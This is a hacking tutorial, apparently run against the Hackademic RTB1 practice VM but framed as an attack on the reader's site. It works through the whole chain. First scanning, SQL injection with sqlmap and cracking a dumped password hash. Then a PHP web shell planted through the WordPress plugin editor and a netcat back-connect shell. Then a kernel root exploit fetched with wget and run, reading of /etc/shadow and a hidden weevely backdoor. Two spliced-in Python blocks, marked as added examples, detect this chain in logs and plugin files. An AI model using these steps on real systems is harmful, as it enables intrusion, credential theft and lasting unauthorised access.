Hack high security site
The answer to this question may be difficult to determine, simply because there are so many ways to hack a site. Our aim in this article is to show you the techniques most used by hackers in targeting and hacking your site!
Let’s suppose that this is your site: hack-test.com
Let’s ping this site to get the server IP:
Now we have 173.236.138.113 – this is the server IP where our target site is hosted.
To find other sites hosted on the same server, we will use sameip.org:
Twenty-six other websites are hosted on this server [173.236.138.113]. Many hackers will target all the other sites on the same server in order to hack your site. But for the purpose of study, we will target your site only and put aside hacking the other sites on the same server.
We’ll need more information about your site, such as:
1. DNS records (A, NS, TXT, MX and SOA)
2. Web server type (Apache, IIS, Tomcat)
3. Registrar (the company that owns your domain)
4. Your name, address, email and phone
5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)
6. Your server OS (Unix, Linux, Windows, Solaris)
7. Your server’s open ports to the internet (80, 443, 21, etc.)
Let’s start by finding your site’s DNS records. We will use the website “Who.is” to achieve this:
We have discovered that your site’s DNS records are:
HACK-TEST.COM DNS RECORDS
Record | Type | TTL | Priority | Content
hack-test.com | A | 4 hours | | 173.236.138.113
hack-test.com | SOA | 4 hours | | ns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400
hack-test.com | NS | 4 hours | | ns1.dreamhost.com
hack-test.com | NS | 4 hours | | ns3.dreamhost.com
hack-test.com | NS | 4 hours | | ns2.dreamhost.com
www.hack-test.com | A | 4 hours | | 173.236.138.113
Let’s determine the web server type:
As you see, your site’s web server is Apache. We will determine its version later.
HACK-TEST.COM SITE INFORMATION
IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank: 1 Month: 3,213,968 3 Month: 2,161,753
Page Views per Visit: 1 Month: 2.0 3 Month: 3.7
Now it is time to find your domain registrar and your name, address, email and phone:
We have now got your registrar and other vital information about you. We can find the type of scripts on your site (and the OS type and web server version) by using a cool tool in BackTrack 5 R1 called WhatWeb:
Now we have found that your site is using a famous PHP script called WordPress, that your server OS is Fedora Linux and that your web server version is Apache 2.2.15. Let’s find the open ports on your server.
To do this, we will use nmap:
1 – Find services that run on the server
root@bt:/# nmap -sV hack-test.com
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
22/tcp closed ssh
80/tcp open   http    Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
2 – Find the server OS
root@bt:/# nmap -O hack-test.com
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.00079s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE
22/tcp closed ssh
80/tcp open   http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
Only port 80 is open and the OS is Linux 2.6.22 (Fedora Core 6).
Now that we have gathered all the important information about your site, let’s scan it for vulnerabilities like SQL injection, blind SQL injection, LFI, RFI, XSS, CSRF, and so forth.
We will use Nikto.pl to gather info and, perhaps, some vulnerabilities:
root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: 192.168.1.2
+ Target Hostname: hack-test.com
+ Target Port: 80
+ Start Time: 2011-12-29 06:50:03
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (Fedora)
+ ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6448 items checked: 1 error(s) and 6 item(s) reported on remote host
+ End Time: 2011-12-29 06:50:37 (34 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
We will also use w3af. You can find this tool in BackTrack 5 R1.
root@bt:/pentest/web/w3af# ./w3af_gui
Starting w3af, running on:
Python version: 2.6.5 (r265:79063, Apr 16 2010, 13:57:41) [GCC 4.4.3]
GTK version: 2.20.1
PyGTK version: 2.17.0
w3af - Web Application Attack and Audit Framework
Version: 1.2
Revision: 4605
Author: Andres Riancho and the w3af team.
We will insert our site URL and choose the full audit option:
After some time, the scan will finish and you will see:
Your site is vulnerable to SQL injection, XSS and others!
Let’s investigate the SQL injection vulnerability:
This is the vulnerable URL and cat is the vulnerable parameter.
So, let’s exploit this vulnerability:
We will find that exploiting this vuln fails, so we will use sqlmap to do the job and dump all the database information that we need to hack this site.
Using sqlmap with -u url
After some seconds you will see:
Type n and press enter to continue.
As you see, your site is vulnerable to error-based SQL injection and your MySQL database version is 5.
Let’s find all databases on your site by adding “--dbs”
Now we have found 3 databases.
We will dump the wordpress database tables by adding “-D wordpress --tables”
We will find all the wordpress tables.
We want to dump the “wp_users” table, so we will find all users’ (admin?) information (user id and password hash) and try to crack the hash and enter the WordPress control panel (wp-admin).
We will find the columns of the “wp_users” table by adding “-T wp_users --columns”
We will find 22 columns.
We just need to dump two columns, so we will dump the user_login and user_pass columns by adding “-C user_login,user_pass --dump”
We will find important information; we have now found users and password hashes, but we want to crack those hashes to clear-text passwords. We will use the online site “http://www.onlinehashcrack.com/free-hash-reverse.php” and try to crack this hash 7CBB3252BA6B7E9C422FAC5334D22054
And the clear-text password is q1w2e3
And the user name is “GeorgeMiller”
We will log in with these details at “wp-admin”
And we are in!
OK, let’s try to upload a PHP web shell to run some Linux commands on your site’s server.
We will edit a plugin in WordPress called “Textile”, or any plugin you find on the plugins page, and choose to edit it.
We will insert the PHP web shell in place of the real plugin code. After we’ve done this, we will hit “update file” and browse to our new PHP shell.
Woo, the PHP shell works. Now we can manipulate your site’s files, but we only want to get root on your server and hack all the other sites too.
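Every step so far went through the web server and therefore through its access log: the sqlmap requests on `cat`, the wp-admin login, the write through the plugin editor and the first request to the modified plugin file. As an added example that is not part of the original post, here is that chain written as Apache combined-log lines (constructed; the paths follow the page, the timestamps and the 10.0.0.8 client are made up, and the attacker address is the 192.168.1.6 named later in the text) run through a small detector.

```python
import re

# Apache combined log format; the sample lines below are constructed
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

SAMPLE_LOG = """\
192.168.1.6 - - [28/Dec/2011:06:55:01 +0200] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.6 - - [28/Dec/2011:06:55:09 +0200] "GET /Hackademic_RTB1/?cat=1%27 HTTP/1.1" 500 612 "-" "sqlmap/0.9 (constructed)"
192.168.1.6 - - [28/Dec/2011:06:55:10 +0200] "GET /Hackademic_RTB1/?cat=1%20AND%201=1 HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (constructed)"
192.168.1.6 - - [28/Dec/2011:07:02:44 +0200] "POST /Hackademic_RTB1/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.6 - - [28/Dec/2011:07:05:12 +0200] "POST /Hackademic_RTB1/wp-admin/plugin-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.6 - - [28/Dec/2011:07:05:30 +0200] "GET /Hackademic_RTB1/wp-content/plugins/textile/textile.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.8 - - [28/Dec/2011:07:06:00 +0200] "GET /Hackademic_RTB1/?cat=2 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
"""

# A category id should be digits only; a quote or a space in it, or a 500 on
# that parameter, is the error-based probing the text describes.
CAT_PROBE = re.compile(r"[?&]cat=[^&]*(%27|'|%20|%22)", re.IGNORECASE)

def detect(log_text):
    """Return (ip, rule, path) findings for the attack chain in the text."""
    findings = []
    editor_users = set()  # client IPs that have written through the plugin editor
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, status, ua = (m.group(k) for k in ("ip", "method", "path", "status", "ua"))
        if "sqlmap" in ua.lower():
            findings.append((ip, "scanner-user-agent", path))
        if CAT_PROBE.search(path) or (status == "500" and "cat=" in path):
            findings.append((ip, "sqli-probe-on-cat", path))
        if method == "POST" and path.endswith("/wp-admin/plugin-editor.php"):
            findings.append((ip, "plugin-editor-write", path))
            editor_users.add(ip)
        elif ip in editor_users and "/wp-content/plugins/" in path and path.endswith(".php"):
            # A plugin file fetched directly right after an editor write is how
            # the modified Textile plugin in the text was reached.
            findings.append((ip, "plugin-file-request-after-edit", path))
    return findings

if __name__ == "__main__":
    for ip, rule, path in detect(SAMPLE_LOG):
        print(ip, rule, path)
```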
We will choose the “back-connect” tab in the PHP web shell and make a back connection to our IP “192.168.1.6” on port “5555”.
But before we hit connect, we first make netcat listen on port “5555” on our attacker machine.
Now hit connect and you will see:
Let’s try some Linux commands
id
uid=48(apache) gid=489(apache) groups=489(apache)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
The id command shows us our user id and group.
The pwd command shows us our current path on the server.
The uname -a command shows us some information about the kernel version.
OK, now we know that the server kernel version is 2.6.31.5-127.fc12.i686
Let’s search exploit-db.com for an exploit for this version or a newer one.
We will type “kernel 2.6.31”
The results table (Date, D, A, V, Description, Plat., Author) lists four entries, dated 2009-10-15, 2009-08-31, 2009-08-25 and 2009-08-04 (descriptions not shown).
After I tried all of them on your server, none of them worked, but then I tried a new exploit:
The results table (same columns) shows one entry, dated 2010-10-19 (description not shown).
I opened this URL and copied this link http://www.exploit-db.com/download/15285
And ran this command in my netcat shell:
wget http://www.exploit-db.com/download/15285 -O roro.c
--2011-12-28 00:48:01-- http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/15285/ [following]
--2011-12-28 00:48:02-- http://www.exploit-db.com/download/15285/
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c'
0K ...... 100% 29.7K=0.2s
We used the wget command to fetch the exploit from exploit-db.com and used -O to rename it to roro.c
Note: Linux kernel exploits are mostly developed in the C language, so we saved it with a .c extension. Just view the exploit source and you will find:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>
#define RECVPORT 5555
#define SENDPORT 6666
int prep_sock(int port)
{
    int s, ret;
    struct sockaddr_in addr;
    s = socket(PF_RDS, SOCK_SEQPACKET, 0);
    if(s < 0) {
        printf("[*] Could not open socket.\n");
        exit(-1);
    }
    memset(&addr, 0, sizeof(addr));
All the above lines indicate that this exploit is written in the C language.
After we have saved our exploit on the server, we will compile it to ELF format by typing
gcc roro.c -o roro
And run our exploit by typing
./roro
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
And after that we type
id
We will find that we are root:
uid=0(root) gid=0(root)
We can now view the /etc/shadow file
cat /etc/shadow
And view the /etc/passwd file
cat /etc/passwd
We can crack all the users’ passwords with the “john the ripper” tool.
But we will not do this; we want to maintain access on this server so we can come back to visit/hack it any time.
We will use weevely to generate a small, encoded, password-protected PHP backdoor and upload this PHP backdoor to our server.
Let’s do it
1 – weevely usage options:
root@bt:/pentest/backdoors/web/weevely# ./main.py -
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
Usage: main.py [options]
Options:
  -h, --help            show this help message and exit
  -g, --generate        Generate backdoor crypted code, requires -o and -p .
  -o OUTPUT, --output=OUTPUT
                        Output filename for generated backdoor .
  -c COMMAND, --command=COMMAND
                        Execute a single command and exit, requires -u and -p .
  -t, --terminal        Start a terminal-like session, requires -u and -p .
  -C CLUSTER, --cluster=CLUSTER
                        Start in cluster mode reading items from the give file, in the form 'label,url,password' where label is optional.
  -p PASSWORD, --password=PASSWORD
                        Password of the encrypted backdoor .
  -u URL, --url=URL     Remote backdoor URL .
2 – Creating a PHP backdoor with the password koko using weevely:
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Backdoor file 'hax.php' created with password 'koko'.
3 – Upload our PHP backdoor to the server using the PHP web shell
And after we upload it, we will connect to it using
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p koko
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Using method 'system()'.
+ Retrieving terminal basic environment variables .
[apache@HackademicRTB1 /var/www/html/Hackademic_RTB1/wp-content/plugins]
Testing our hax.php backdoor
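Both footholds on this server, the Textile plugin rewritten through the editor and the hax.php dropped next to it, are a changed or new .php file under wp-content/plugins. As an added example that is not part of the original post, here is a baseline-and-diff check for that directory together with a crude scan for the constructs generated PHP backdoors depend on; the plugin tree and file contents are constructed in a temporary directory, and the indicator patterns are an assumption, not a complete signature set.

```python
import hashlib
import os
import re
import tempfile

# Assumed indicator patterns: constructs that legitimate plugin code rarely
# needs but generated or obfuscated backdoors almost always use.
SUSPICIOUS = [
    r"\beval\s*\(",
    r"\bbase64_decode\s*\(",
    r"\bstr_rot13\s*\(",
    r"\b(system|shell_exec|passthru|popen|proc_open)\s*\(",
    r"\$_(GET|POST|COOKIE|REQUEST|SERVER)\s*\[[^\]]*\]\s*\)",  # request data straight into a call
]

def baseline(root):
    """Map relative path -> sha256 for every .php file under root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests

def diff_baseline(root, known):
    """Compare the directory with a saved baseline: (added, modified, removed)."""
    now = baseline(root)
    added = sorted(set(now) - set(known))
    removed = sorted(set(known) - set(now))
    modified = sorted(p for p in now if p in known and now[p] != known[p])
    return added, modified, removed

def indicators(path):
    """Which SUSPICIOUS patterns occur in one PHP file."""
    with open(path, "r", errors="replace") as fh:
        src = fh.read()
    return [pat for pat in SUSPICIOUS if re.search(pat, src)]

def demo():
    # Constructed plugin directory: one clean plugin, then the two changes
    # described in the text (plugin edited in place, extra file dropped).
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "textile"))
    clean = os.path.join(root, "textile", "textile.php")
    with open(clean, "w") as fh:
        fh.write("<?php\nfunction textile_render($t) { return $t; }\n")
    known = baseline(root)                      # taken while the site is healthy
    with open(clean, "a") as fh:                # editor write: command execution appended
        fh.write("system($_GET['cmd']);\n")
    with open(os.path.join(root, "hax.php"), "w") as fh:   # dropped backdoor
        fh.write("<?php eval(base64_decode($_COOKIE['k']));\n")
    added, modified, removed = diff_baseline(root, known)
    flagged = {p: indicators(os.path.join(root, p)) for p in added + modified}
    return {"added": added, "modified": modified, "removed": removed, "flagged": flagged}

if __name__ == "__main__":
    print(demo())
```

The baseline is only useful if it is taken from a known-good copy and stored off the web root, where the apache user cannot rewrite it.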